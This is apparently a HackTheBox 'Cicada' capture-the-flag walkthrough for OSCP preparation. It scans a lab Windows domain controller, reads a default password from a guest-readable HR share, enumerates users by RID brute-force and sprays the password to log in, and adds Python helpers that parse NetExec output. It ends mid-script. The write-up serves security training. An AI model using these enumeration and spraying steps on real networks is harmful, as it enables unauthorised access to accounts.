# Cicada | HackTheBox | OSCP Preparation

medium.com · SilentExploit
~18 min read · March 23, 2026 (Updated: March 23, 2026)

Start off by setting the target machine's IP as an environment variable:

```
┌──(root㉿user)-[/home/user/bhs]
└─# export target=10.129.231.149

┌──(root㉿user)-[/home/user/bhs]
└─# echo $target
10.129.231.149
```

This way, we don't have to constantly type in the IP whenever we want to run tools against the target.

I start with a large Nmap scan of the target: on medium / hard boxes you'll be looking at what services are available (website, APIs etc.), whereas on the easy boxes it's more of a preliminary measure just to get a quick lay of the land.

```
┌──(root㉿user)-[/home/user/Downloads/OSCP]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 11:52 PDT
Initiating SYN Stealth Scan at 11:52
Scanning cicada.htb (10.129.231.149) [65535 ports]
Discovered open port 53/tcp on 10.129.231.149
Discovered open port 445/tcp on 10.129.231.149
Discovered open port 139/tcp on 10.129.231.149
Discovered open port 135/tcp on 10.129.231.149
Discovered open port 389/tcp on 10.129.231.149
Discovered open port 88/tcp on 10.129.231.149
SYN Stealth Scan Timing: About 35.04% done; ETC: 11:53 (0:00:57 remaining)
Discovered open port 5985/tcp on 10.129.231.149
Discovered open port 464/tcp on 10.129.231.149
Discovered open port 636/tcp on 10.129.231.149
SYN Stealth Scan Timing: About 67.07% done; ETC: 11:54 (0:00:43 remaining)
Discovered open port 3268/tcp on 10.129.231.149
Discovered open port 3269/tcp on 10.129.231.149
Completed SYN Stealth Scan at 11:54, 131.68s elapsed (65535 total ports)
Nmap scan report for cicada.htb (10.129.231.149)
Host is up (0.22s latency).
Not shown: 65524 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 131.78 seconds
           Raw packets sent: 196676 (8.654MB) | Rcvd: 229 (27.033KB)

Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 11:54 PDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating SYN Stealth Scan at 11:54
Scanning cicada.htb (10.129.231.149) [1000 ports]
Discovered open port 139/tcp on 10.129.231.149
Discovered open port 53/tcp on 10.129.231.149
Discovered open port 135/tcp on 10.129.231.149
Discovered open port 445/tcp on 10.129.231.149
Discovered open port 3269/tcp on 10.129.231.149
Discovered open port 88/tcp on 10.129.231.149
Discovered open port 5985/tcp on 10.129.231.149
Discovered open port 3268/tcp on 10.129.231.149
Discovered open port 389/tcp on 10.129.231.149
Discovered open port 636/tcp on 10.129.231.149
Discovered open port 464/tcp on 10.129.231.149
Completed SYN Stealth Scan at 11:55, 24.90s elapsed (1000 total ports)
Initiating Service scan at 11:55
Scanning 11 services on cicada.htb (10.129.231.149)
Completed Service scan at 11:55, 48.18s elapsed (11 services on 1 host)
NSE: Script scanning 10.129.231.149.
Initiating NSE at 11:55
Completed NSE at 11:56, 40.17s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 2.68s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Nmap scan report for cicada.htb (10.129.231.149)
Host is up (0.17s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-23 01:55:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: 2026-03-23T01:56:41+00:00; +7h00m05s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-23T01:56:40+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: 2026-03-23T01:56:41+00:00; +7h00m05s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: 2026-03-23T01:56:40+00:00; +7h00m04s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-23T01:56:00
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m04s, deviation: 0s, median: 7h00m04s

NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.01s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.46 seconds
           Raw packets sent: 2991 (131.604KB) | Rcvd: 23 (1.012KB)

Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 11:56 PDT
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:56
NSE Timing: About 46.15% done; ETC: 11:57 (0:00:40 remaining)
Completed NSE at 11:57, 36.36s elapsed
Initiating NSE at 11:57
Completed NSE at 11:57, 0.00s elapsed
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Initiating Ping Scan at 11:57
Scanning 10.129.231.149 [4 ports]
Completed Ping Scan at 11:57, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:57
Scanning cicada.htb (10.129.231.149) [1000 ports]
Discovered open port 53/tcp on 10.129.231.149
Discovered open port 445/tcp on 10.129.231.149
Discovered open port 135/tcp on 10.129.231.149
Discovered open port 139/tcp on 10.129.231.149
Discovered open port 5985/tcp on 10.129.231.149
Discovered open port 389/tcp on 10.129.231.149
Discovered open port 464/tcp on 10.129.231.149
Discovered open port 88/tcp on 10.129.231.149
Discovered open port 3269/tcp on 10.129.231.149
Discovered open port 636/tcp on 10.129.231.149
Discovered open port 3268/tcp on 10.129.231.149
Completed SYN Stealth Scan at 11:57, 9.29s elapsed (1000 total ports)
NSE: Script scanning 10.129.231.149.
Initiating NSE at 11:57
Completed NSE at 11:58, 45.74s elapsed
Initiating NSE at 11:58
Completed NSE at 11:58, 0.01s elapsed
Nmap scan report for cicada.htb (10.129.231.149)
Host is up (0.14s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

NSE: Script Post-scanning.
Initiating NSE at 11:58
Completed NSE at 11:58, 0.00s elapsed
Initiating NSE at 11:58
Completed NSE at 11:58, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 91.98 seconds
           Raw packets sent: 1996 (87.800KB) | Rcvd: 15 (644B)
```

Important bits of information to add to your /etc/hosts file:

- Domain: cicada.htb
- FQDN: CICADA-DC.cicada.htb

```
┌──(root㉿user)-[/home/user/bhs]
└─# cat /etc/hosts
10.129.231.149 cicada.htb CICADA-DC.cicada.htb
```

I checked whether the SMB server accepts the guest account with a blank password, then used Netexec's spider_plus module to produce a JSON file containing a tree-like structure of all the files in the readable shares (this is a good tool to get in the habit of using, as it saves you from manually trawling through large directory structures).

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u guest -p '' --shares
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV
SMB         10.129.231.149  445    CICADA-DC        HR              READ
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.129.231.149  445    CICADA-DC        SYSVOL                          Logon server share

┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u guest -p '' -M spider_plus
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\guest:
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV
SMB         10.129.231.149  445    CICADA-DC        HR              READ
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.129.231.149  445    CICADA-DC        SYSVOL                          Logon server share
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.231.149.json".
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Readable Shares:  2 (HR, IPC$)
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Total folders found:  0
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Total files found:    1
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size average:    1.24 KB
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size min:        1.24 KB
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size max:        1.24 KB

┌──(root㉿user)-[/home/user]
└─# cat /root/.nxc/modules/nxc_spider_plus/10.129.231.149.json
{
    "HR": {
        "Notice from HR.txt": {
            "atime_epoch": "2024-08-28 10:31:48",
            "ctime_epoch": "2024-03-14 05:29:03",
            "mtime_epoch": "2024-08-28 10:31:48",
            "size": "1.24 KB"
        }
    }
}
```

This file, 'Notice from HR.txt', is the only file our guest has access to. It also sits in a non-standard share: NETLOGON, SYSVOL etc. are defaults (that doesn't mean they are not worth enumerating, but you want to go for the juicy stuff first). If we download and cat this Notice from HR we see the following:

```
┌──(root㉿user)-[/home/user]
└─# smbclient //10.129.231.149/'HR' -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 05:29:09 2024
  ..                                  D        0  Thu Mar 14 05:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 10:31:48 2024

                4168447 blocks of size 4096. 477444 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \> ^C
```

```
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default passwor>

Your default password is: Cicada$M6Corpb*@Lp#nZp!8
```

Now we have a default password, but we don't know which user it applies to.
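The spider_plus JSON above is tiny on this box, but on a real domain it runs to thousands of entries. The script below is an added example (not part of the write-up and not NetExec's own code) that walks such a dump and lists every file the scanning account could read, custom shares first, so the non-default shares stand out. The HR entry in the sample mirrors the dump above; the DEV and SYSVOL entries are constructed to exercise nested folders and the default-share ordering, and the walk handles both nested folders and flat "folder/file" keys, whichever form the dump uses.

```python
"""Summarise a NetExec spider_plus JSON dump: which shares and files the
scanning account could read, custom shares listed before the default ones.
Added example; not NetExec's code and not from the write-up."""
import json
import re

# Shares that exist on every domain controller. Anything else is a custom
# share and is where the interesting material usually lives.
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL", "print$"}

_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}


def parse_size(text):
    """Convert spider_plus's human-readable size ("1.24 KB", "23 B") to bytes."""
    m = re.fullmatch(r"\s*([\d.]+)\s*([KMG]?B)\s*", text)
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return round(float(m.group(1)) * _UNITS[m.group(2)])


def _walk(node, prefix):
    """Yield (relative path, metadata) for every file below node.
    A file entry is a dict carrying a 'size' key; any other dict is a folder."""
    for name, value in node.items():
        path = f"{prefix}/{name}" if prefix else name
        if not isinstance(value, dict):
            continue
        if "size" in value:
            yield path, value
        else:
            yield from _walk(value, path)


def list_files(tree):
    """Flatten the dump into one record per file, custom shares first."""
    records = []
    for share, contents in tree.items():
        for path, meta in _walk(contents, ""):
            records.append({
                "share": share,
                "path": path,
                "bytes": parse_size(meta["size"]),
                "mtime": meta.get("mtime_epoch"),
                "default_share": share in DEFAULT_SHARES,
            })
    records.sort(key=lambda r: (r["default_share"], r["share"], r["path"]))
    return records


def readable_shares(tree):
    """Names of shares that exposed at least one file to the scanning account."""
    return sorted({r["share"] for r in list_files(tree)})


# Constructed sample. The HR entry mirrors the dump in the write-up; the DEV
# and SYSVOL entries are made up to exercise nested folders and the
# default-share ordering.
SAMPLE_DUMP = json.loads(r"""
{
  "HR": {
    "Notice from HR.txt": {
      "atime_epoch": "2024-08-28 10:31:48",
      "ctime_epoch": "2024-03-14 05:29:03",
      "mtime_epoch": "2024-08-28 10:31:48",
      "size": "1.24 KB"
    }
  },
  "DEV": {
    "scripts": {
      "Backup_script.ps1": {
        "atime_epoch": "2024-08-28 10:40:00",
        "ctime_epoch": "2024-08-28 10:40:00",
        "mtime_epoch": "2024-08-28 10:40:00",
        "size": "1.09 KB"
      }
    }
  },
  "SYSVOL": {
    "cicada.htb": {
      "Policies": {
        "GPT.INI": {
          "atime_epoch": "2024-03-14 05:21:29",
          "ctime_epoch": "2024-03-14 05:21:29",
          "mtime_epoch": "2024-03-14 05:21:29",
          "size": "23 B"
        }
      }
    }
  }
}
""")

if __name__ == "__main__":
    for rec in list_files(SAMPLE_DUMP):
        tag = "default" if rec["default_share"] else "CUSTOM "
        print(f"{tag} {rec['share']:<10} {rec['bytes']:>8} B  {rec['path']}")
```

Point it at the real dump with `list_files(json.load(open(path)))`; the sort key puts custom shares before ADMIN$/SYSVOL/NETLOGON so the review starts where the guest-readable oddities are.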
The simple solution here is to spray the password against all the users in the domain. Use Netexec's --rid-brute flag to get a list of the users, which we save line by line into a userlist (users.txt):

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u guest -p '' --rid-brute
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.231.149  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
```

Note: if you want to turn the above output directly into a line-by-line user file (keeping only the accounts listed as SidTypeUser), use this:

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u guest -p '' --rid-brute | grep '(SidTypeUser)' | awk '{print $6}' | cut -d'\' -f2
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```

Spray this password against the userlist and you can see a successful login for michael.wrightson:

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
```

I then enumerated the shares as michael.wrightson:

```
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV
SMB         10.129.231.149  445    CICADA-DC        HR              READ
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share

┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -M spider_plus
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV
SMB         10.129.231.149  445    CICADA-DC        HR              READ
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.231.149.json".
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Readable Shares:  4 (HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Total folders found:  33
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] Total files found:    11
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size average:    1.14 KB
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size min:        23 B
SPIDER_PLUS 10.129.231.149  445    CICADA-DC        [*] File size max:        5.22 KB
```

Although he had read access to other shares, there was nothing fruitful in them. I also tried kerberoasting with his credentials but this didn't work.

In CTFs, the next step is HUGE in AD: enumerate the description column for users on the domain.
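The `grep | awk | cut` pipeline above works on this box, but `awk '{print $6}'` silently truncates any account name that contains a space (the way "Dev Support" does for a group here). The script below is an added example, neither NetExec's code nor part of the write-up, that parses `--rid-brute` output with a regex instead, and applies the same parsing to `--users` output to flag description fields that mention a password, which is the check the paragraph above introduces. The sample lines mirror the write-up's output; the `svc backup` account is constructed to show the name-with-space case.

```python
"""Parse NetExec (nxc smb) output: build a user list from --rid-brute and flag
--users rows whose description looks like it carries a credential.
Added example; not NetExec's code and not from the write-up."""
import re

# Every nxc line starts with "<PROTO> <ip> <port> <hostname>"; drop that first.
_PREFIX = re.compile(r"^(?:SMB|LDAP|WINRM)\s+\S+\s+\d+\s+\S+\s+")

# --rid-brute rows look like "1104: CICADA\john.smoulder (SidTypeUser)".
# The account name may contain spaces, which is why a fixed awk column can truncate it.
_RID_ROW = re.compile(
    r"^(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<sidtype>\w+)\)\s*$"
)

# --users rows look like "<name> <YYYY-MM-DD HH:MM:SS> <bad pw count> <description>".
_USER_ROW = re.compile(
    r"^(?P<user>\S+)\s+(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})"
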